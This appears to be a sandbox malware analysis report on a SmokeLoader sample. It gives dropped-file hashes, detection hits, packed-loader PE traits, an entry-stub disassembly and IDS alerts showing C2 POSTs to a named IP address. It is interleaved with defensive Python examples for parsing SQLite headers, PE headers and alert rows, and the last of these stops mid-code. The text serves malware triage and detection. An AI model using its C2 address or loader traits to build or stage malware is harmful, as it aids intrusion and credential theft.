                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):32768
                      Entropy (8bit):0.017262956703125623
                      Encrypted:false
                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                      Malicious:false
                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):32768
                      Entropy (8bit):0.017262956703125623
                      Encrypted:false
                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                      Malicious:false
                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                      Category:dropped
                      Size (bytes):28672
                      Entropy (8bit):2.5793180405395284
                      Encrypted:false
                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.1358696453229276
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):49152
                      Entropy (8bit):0.8180424350137764
                      Encrypted:false
                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                      MD5:349E6EB110E34A08924D92F6B334801D
                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\explorer.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
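The three databases above are typed from their first 100 bytes alone: the "File Type" line is a rendering of the SQLite header fields. The following Python is added here as a worked example; it is not part of the Joe Sandbox report or of any tool the report names. It decodes the header into the same fields the report prints and adds the consistency check an analyst wants when a dropped database is examined: page size times page count must equal the file size (2048 × 52 = 106496 bytes for the first entry; a shorter file is a truncated copy or a write caught mid-transaction). The header bytes are constructed inline from the first entry's values, not read from the dropped file.

```python
import struct

# Magic string and field offsets follow the SQLite file-format specification
# (https://www.sqlite.org/fileformat.html); every header field is big-endian.
SQLITE_MAGIC = b"SQLite format 3\x00"
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def parse_sqlite_header(data: bytes) -> dict:
    """Decode the header fields that the report's File Type line is built from."""
    if len(data) < 100 or data[:16] != SQLITE_MAGIC:
        raise ValueError("not a SQLite 3 database header")
    page_size = struct.unpack_from(">H", data, 16)[0]
    if page_size == 1:                      # the value 1 encodes a 65536-byte page
        page_size = 65536
    (change_counter, page_count, _freelist_trunk, _freelist_count,
     schema_cookie, schema_format, _cache_size, _largest_root,
     text_encoding, _user_version, _incr_vacuum, _app_id) = struct.unpack_from(">12I", data, 24)
    version_valid_for, sqlite_version = struct.unpack_from(">II", data, 92)
    return {
        "page_size": page_size,
        "change_counter": change_counter,
        "page_count": page_count,
        "schema_cookie": schema_cookie,
        "schema_format": schema_format,
        "encoding": ENCODINGS.get(text_encoding, "unknown(%d)" % text_encoding),
        "version_valid_for": version_valid_for,
        "sqlite_version": sqlite_version,
        # what the file should occupy on disk; a mismatch means truncation or an
        # interrupted write, both worth knowing before the tables are trusted
        "expected_size": page_size * page_count,
    }


def describe(data: bytes, actual_size=None) -> str:
    """Render the header the way the report's File Type line does, plus the size check."""
    h = parse_sqlite_header(data)
    line = ("SQLite 3.x database, last written using SQLite version %d, page size %d, "
            "file counter %d, database pages %d, cookie %#x, schema %d, %s, version-valid-for %d"
            % (h["sqlite_version"], h["page_size"], h["change_counter"], h["page_count"],
               h["schema_cookie"], h["schema_format"], h["encoding"], h["version_valid_for"]))
    if actual_size is not None and actual_size != h["expected_size"]:
        line += " [size mismatch: header implies %d bytes, file is %d]" % (h["expected_size"], actual_size)
    return line


def build_header(page_size, change_counter, page_count, schema_cookie, schema_format,
                 text_encoding, version_valid_for, sqlite_version) -> bytes:
    """Constructed 100-byte header for offline testing; not bytes taken from a dropped file."""
    hdr = bytearray(100)
    hdr[0:16] = SQLITE_MAGIC
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18] = hdr[19] = 1                   # write/read format version: legacy rollback journal
    hdr[21], hdr[22], hdr[23] = 64, 32, 32  # payload fractions, fixed values per the spec
    struct.pack_into(">12I", hdr, 24, change_counter, page_count, 0, 0, schema_cookie,
                     schema_format, 0, 0, text_encoding, 0, 0, 0)
    struct.pack_into(">II", hdr, 92, version_valid_for, sqlite_version)
    return bytes(hdr)


# Values copied from the first dropped database above; that file is 106496 bytes long.
SAMPLE_HEADER = build_header(2048, 3, 52, 0x21, 4, 1, 3, 3042000)

if __name__ == "__main__":
    print(describe(SAMPLE_HEADER, actual_size=106496))
```

Run against a real file, pass `open(path, "rb").read(100)` and `os.path.getsize(path)`; the function never touches page content, so it is safe on a database that is still being written by the harvesting process.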
                      Process:C:\Windows\explorer.exe
                      File Type:data
                      Category:modified
                      Size (bytes):339146
                      Entropy (8bit):7.999548154501351
                      Encrypted:true
                      SSDEEP:6144:hYXXHFMwwf2Bv6VKAQFAZECTOVoRmUSyz9uUBElwGuDWvXphN:hYHH3wuByOCmCT44mUSyzKwGuDWvZhN
                      MD5:2D5E8273B1A2801838262A4248FFEEA5
                      SHA1:5A820011AC547D26FCCB0292CB5DC77E691FCB3D
                      SHA-256:3A4B1F030372E1D7F1BD21B56459EC340C3771C50657DB81727D575AF19CD482
                      SHA-512:BCC8030E1CA1EEE880B039B1ECD74A630302E78818654AFE5BA978A2AD011B0C8AEA75631345654DE7D85C7136AFAF9FA31C6A69FA711C517C0FEBC32742D31C
                      Malicious:false
                      Preview:.D.%]..*..K`..._~p...Z..5F...~....7....j..B.3v.....#'.Q...a...zfc@.7......S.=..S....911/..y...+V..=..=...l......+...&z'.X..t@./&..a[.q#.,6.Z.jC.M."...i&6..a../Sm...[.q....uH.=3g:..k..M.b|ST.I....)..E..|..(....Dnb=..`......!..7.C.k..]....~....-......*..P]_g.M.&..K.......;O.d}'....Q.1q.mvw=V.......Q.C...]..S..A+..|".%c.}....).;..v*.{v...$o....N.).<....:-&..>t...,....\...<.....*.B#~w.it....D..,d..e.........7.r....`D....E..V.....T..r....V1).nr*.......s.T..\N...@...".E.\_...sQ..D.Z.idr\..'Q.....fG...s......E~.9W...<:Mnk.pQ..P.........#.l....BL12...j..o.........h.y4\.}^.....j.<..TSO.D.9.^....o...i};.6...v......=..Ti..>yq...^0D...8.W......G......=.#.N....7.b....N..i.FHc..2up.....`...\.D(+|B{...[uD.\!..^...,>G.....".oc>s..\..m.WBk;........b*....,..]..o.....f.4dq.....c.IM.[.<J..<...MW.T..r.......I....g.....gr....@k.v...n&D....\l.... ._...H.....u\..5.F^-./G$..M..*..Q....F..u\6F.K..U.UR@w.<:_.3w...........r~.(.Sy%..J."....:swY.....9..h
                      Process:C:\Windows\explorer.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):37888
                      Entropy (8bit):6.95340212298466
                      Encrypted:false
                      SSDEEP:384:sKZ1vXmx5SW6+aWmDVRuLMROLHrN/DKMtoCDl67us6lmXBhXSSS5d8P38lH9yvLJ:NvKaWmOvZxlV5AXHSLd8Uldyvjwt
                      MD5:9C0DE297B9EA30FFBE100EE12150F122
                      SHA1:DA6096EDEE23CFD59CF90C1E6A3A9146AE9D5FF0
                      SHA-256:F7544F07B4468E38E36607B5AC5B3835EAC1487E7D16DD52CA882B3D021C19B6
                      SHA-512:EE92B7ED7A10FEBD6F3D9F826B72E1F9F57BE2183AE959528B4328411069BAA633EE6C1B1F5BEDA76C8616E4F8E56FA24A7A2076F84CC400402551E61CF95721
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\rrrrcve, Author: Joe Security
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 55%
                      Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L.....Lf...............H.............1............@..................................r...............................................................................................................................................................text............................... ....................................................................................................f4l.........k.....-Tah.\...G.PQ..bs.#ft.6.R....%.y._....z[.w.i._17.%...X...c(.X.....`...>.'|b^~U..1....k^6X..(.....Y`..9.A{..d...S.+.4w.4@'l.'+.`..?.#>.x!.. .ye..;]....r.0.?w...o*...7d.0..8..&t..?.. bO..V....Bp...&.-A<.C^...y..?N..0..hv...~.t..z.Dj.m...(c1...!/..m._..f...fN...9..'..Z....Ou....'..,..............B....M\......'...?....A.L.mXxt.u.Q.KG.....<$t.u..4{.....4$.....u.t...4$......................L$D.......V..^.........@@L$D0...u.t..rp^u.t..{*U_.U..VW..!P..h.
                      Process:C:\Windows\explorer.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.95340212298466
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • VXD Driver (31/22) 0.00%
                      File name:171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe
                      File size:37'888 bytes
                      MD5:9c0de297b9ea30ffbe100ee12150f122
                      SHA1:da6096edee23cfd59cf90c1e6a3a9146ae9d5ff0
                      SHA256:f7544f07b4468e38e36607b5ac5b3835eac1487e7d16dd52ca882b3d021c19b6
                      SHA512:ee92b7ed7a10febd6f3d9f826b72e1f9f57be2183ae959528b4328411069baa633ee6c1b1f5beda76c8616e4f8e56fa24a7a2076f84cc400402551e61cf95721
                      SSDEEP:384:sKZ1vXmx5SW6+aWmDVRuLMROLHrN/DKMtoCDl67us6lmXBhXSSS5d8P38lH9yvLJ:NvKaWmOvZxlV5AXHSLd8Uldyvjwt
                      TLSH:E403D173B041903FCB6C9376D0CA4A1F6F646FC72AE81AED0054AFAA7C513997536119
                      File Content Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L.....Lf...............H.............1............@..................................r.....................................
                      Icon Hash:90cececece8e8eb0
                      Entrypoint:0x4031a5
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      DLL Characteristics:
                      Time Stamp:0x664CB797 [Tue May 21 15:02:47 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:1
                      OS Version Minor:0
                      File Version Major:1
                      File Version Minor:0
                      Subsystem Version Major:1
                      Subsystem Version Minor:0
                      Import Hash:
                      Instruction
                      call 00007F3CA871FF95h
                      jne 00007F3CA871FF96h
                      je 00007F3CA871FF94h
                      arpl word ptr [ebx-75h], dx
                      sbb al, 24h
                      add esp, 04h
                      jmp 00007F3CA871FF9Ch
                      inc esp
                      sub ebx, 000031AAh
                      jmp 00007F3CA871FF97h
                      add ch, bl
                      cmc
                      inc esp
                      add dh, byte ptr [edi+eax+75h]
                      add eax, D6AFFEA7h
                      int1
                      push 00000030h
                      jne 00007F3CA871FF98h
                      je 00007F3CA871FF96h
                      pop edx
                      sub al, 94h
                      dec esp
                      add esp, 04h
                      mov edx, dword ptr [esp-04h]
                      jmp 00007F3CA871FF98h
                      dec esp
                      sub eax, eax
                      jmp 00007F3CA871FF97h
                      sub bl, ch
                      stc
                      dec esp
                      sub bl, ch
                      add eax, 246C7744h
                      inc esp
                      add eax, dword ptr fs:[edx]
                      je 00007F3CA871FF98h
                      jne 00007F3CA871FF96h
                      pushad
                      sar byte ptr [ebx], FFFFFFC2h
                      push dword ptr [eax+000000A4h]
                      jne 00007F3CA871FF98h
                      je 00007F3CA871FF96h
                      inc ecx
                      cmc
                      xor ebp, dword ptr [edi-7CDBF375h]
                      les eax, fword ptr [ebx+ebp*8]
                      push es
                      sahf
                      outsd
                      and al, 44h
                      nop
                      mov al, byte ptr [eax+687C06F9h]
                      jmp 00007F3CA871FF9Dh
                      push edi
                      test dword ptr [5E509683h], edx
                      jmp 00007F3CA871FF97h
                      and eax, E2F8EBBDh
                      jmp 00007F3CA871FF98h
                      mov bl, 6Fh
                      and al, 44h
                      and byte ptr [edx+0248B60Fh], FFFFFFEBh
                      add eax, 246FC6C4h
                      inc esp
                      add ecx, 01h
                      jmp 00007F3CA871FFA0h
                      pop ebp
                      outsd
                      daa
                      push ecx
                      mov eax, dword ptr [esp]
                      add esp, 04h
                      jmp 00007F3CA871FF97h
                      outsd
                      int EBh
                      push ecx
                      jmp 00007F3CA871FF9Eh
                      mov ebp, 5CB9E304h
                      xor dword ptr [eax], eax
                      add bl, ch
                      add eax, F5EBF525h
                      or bl, ch
                      add dword ptr [000000F7h], edi
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x1000 | 0x902e | 0x9200 | 023bdd46c37b61bc74f979b7d62ef701 | False | 0.7501872859589042 | data | 6.9994558883301154 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
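The static facts above describe a loader stub before it unpacks: every data directory is empty (so no import table, which is why the Import Hash is blank), relocations are stripped and DllCharacteristics is zero (fixed base 0x400000, no ASLR or DEP opt-in), and the only section is a .text that is readable, writable and executable with an entropy of 6.999. The following Python is added here as a worked example, not code from the report or from Joe Sandbox; it parses a PE32 with the standard library only and turns those header facts into triage findings. The image it inspects is constructed inline to mirror the headers reported above; its section body is pseudo-random filler standing in for the real packed code, so its measured entropy is higher than the 6.9995 of the actual sample.

```python
import math
import random
import struct

# Flag values from winnt.h
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
DLL_DYNAMIC_BASE = 0x0040
DLL_NX_COMPAT = 0x0100
DIR_IMPORT, DIR_BASERELOC = 1, 5


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, close to 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe32(data: bytes) -> dict:
    """Read the PE32 headers this triage needs (stdlib only; raises on non-PE32 input)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _machine, nsec, timestamp, _sym, _nsym, opt_size, chars = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                                  # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 optional header")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsys_ver = struct.unpack_from("<HH", data, opt + 48)
    _subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):                          # section table follows the optional header
        name, vsize, va, rawsize, rawptr, _, _, _, _, sc = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va, "vsize": vsize,
                         "rawsize": rawsize, "chars": sc, "entropy": shannon_entropy(data[rawptr:rawptr + rawsize])})
    return {"timestamp": timestamp, "characteristics": chars, "entry_rva": entry_rva, "image_base": image_base,
            "subsys_ver": subsys_ver, "dll_chars": dll_chars, "dirs": dirs, "sections": sections}


def triage(pe: dict) -> list:
    """Static red flags; each string names the header fact it was derived from."""
    f = []
    if pe["dirs"][DIR_IMPORT] == (0, 0):
        f.append("no import directory: every API must be resolved at run time (PEB walk / hashed names)")
    if pe["characteristics"] & IMAGE_FILE_RELOCS_STRIPPED and pe["dirs"][DIR_BASERELOC] == (0, 0):
        f.append("relocations stripped: image only works at its fixed base %#x" % pe["image_base"])
    if not pe["dll_chars"] & DLL_DYNAMIC_BASE:
        f.append("DllCharacteristics lacks DYNAMIC_BASE: no ASLR")
    if not pe["dll_chars"] & DLL_NX_COMPAT:
        f.append("DllCharacteristics lacks NX_COMPAT: no DEP opt-in")
    if pe["subsys_ver"] < (4, 0):
        f.append("subsystem version %d.%d is below what mainstream linkers emit" % pe["subsys_ver"])
    if len(pe["sections"]) == 1:
        f.append("single-section image: code, data and strings all live in one blob")
    wx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    for s in pe["sections"]:
        if s["chars"] & wx == wx:
            f.append("section %s is writable and executable: code can be decrypted in place" % s["name"])
        if s["chars"] & IMAGE_SCN_CNT_CODE and s["entropy"] > 6.5:
            f.append("code section %s has entropy %.2f: packed or encrypted" % (s["name"], s["entropy"]))
    ep = pe["entry_rva"]
    if not any(s["va"] <= ep < s["va"] + max(s["vsize"], s["rawsize"]) for s in pe["sections"]):
        f.append("entry point RVA %#x lies outside every section" % ep)
    return f


def build_sample() -> bytes:
    """Constructed PE32 mirroring the report: base 0x400000, entry 0x4031a5, one W+X .text
    of 0x902e/0x9200 bytes, relocs stripped, all 16 data directories empty."""
    rng = random.Random(0x664CB797)
    text = bytes(rng.getrandbits(8) for _ in range(0x9200))   # filler standing in for the packed body
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0x664CB797, 0, 0, 224, 0x010F)
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII",
                      0x10B, 0, 0, 0x9200, 0, 0, 0x31A5, 0x1000, 0, 0x400000, 0x1000, 0x200,
                      1, 0, 1, 0, 1, 0,             # OS, image and subsystem versions 1.0, as reported
                      0, 0xB000, 0x400, 0, 2, 0,    # SizeOfImage, SizeOfHeaders, checksum, GUI, DllCharacteristics 0
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128   # 16 empty directories
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x902E, 0x1000, 0x9200, 0x400, 0, 0, 0, 0,
                      IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    return (bytes(dos) + b"PE\0\0" + coff + opt + sec).ljust(0x400, b"\0") + text


if __name__ == "__main__":
    for finding in triage(parse_pe32(build_sample())):
        print("-", finding)
```

None of these findings is proof of malice on its own (hand-rolled packers and some protectors produce the same shape), but the combination of no imports, a single W+X section and high code entropy is exactly what should route a sample to dynamic analysis rather than to a static signature scan.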
                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                      05/28/24-08:25:40.383744 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49748 | 80 | 192.168.2.4 | 77.232.129.190
                      05/28/24-08:25:18.651241 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49747 | 80 | 192.168.2.4 | 77.232.129.190
                      05/28/24-08:23:59.175650 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49736 | 80 | 192.168.2.4 | 77.232.129.190
                      05/28/24-08:25:17.382161 | TCP | 2039103 | ET TROJAN Suspected Smokeloader Activity (POST) | 49746 | 80 | 192.168.2.4 | 77.232.129.190
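In the raw text export of this report the alert and packet tables run the port and address columns together with no separator (for example 4974880192.168.2.477.232.129.190 is 49748, 80, 192.168.2.4, 77.232.129.190). Splitting such a string is genuinely ambiguous: "477" can be the octets 4|77 or 47|7, and "4974880" can be the ports 497|4880, 4974|880 or 49748|80. The following Python is added here as a worked example, not part of Joe Sandbox or the report; it enumerates every valid reading and then resolves it with two hints an analyst has anyway, the set of hosts known to be in the capture and the rule that exactly one side of a client flow uses a Windows ephemeral port (49152 to 65535). It then folds the packet rows into per-flow direction counts. The sample rows are copied from the tables on this page; the known-host set is the sandbox VM plus the peer named in the alerts.

```python
import re
from collections import Counter

# Row shapes as they appear once the report's table columns were run together.
ALERT_RE = re.compile(r"^(?P<ts>\d\d/\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)(?P<proto>TCP|UDP|ICMP)"
                      r"(?P<sid>\d+)(?P<msg>.*?)(?P<tail>\d[\d.]*)$")
PACKET_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]{3,4})(?P<tail>\d[\d.]*)$")
WINDOWS_EPHEMERAL = (49152, 65535)


def _octet_ok(s: str) -> bool:
    return s.isdigit() and 1 <= len(s) <= 3 and (len(s) == 1 or s[0] != "0") and int(s) <= 255


def _port_ok(s: str) -> bool:
    return s.isdigit() and (len(s) == 1 or s[0] != "0") and int(s) <= 65535


def candidate_tuples(tail: str) -> list:
    """Every (sport, dport, sip, dip) reading of 'sportdportA.B.C.DE.F.G.H'.
    Splitting on '.' gives [sport+dport+A, B, C, D+E, F, G, H]; only the first and
    fourth groups need splitting, and both splits can have several valid answers."""
    parts = tail.split(".")
    if len(parts) != 7:
        return []
    head, b, c, de, f, g, h = parts
    if not all(_octet_ok(x) for x in (b, c, f, g, h)):
        return []
    out = []
    for i in range(1, len(head)):
        for j in range(i + 1, len(head)):
            sport, dport, a = head[:i], head[i:j], head[j:]
            if not (_port_ok(sport) and _port_ok(dport) and _octet_ok(a)):
                continue
            for k in range(1, len(de)):
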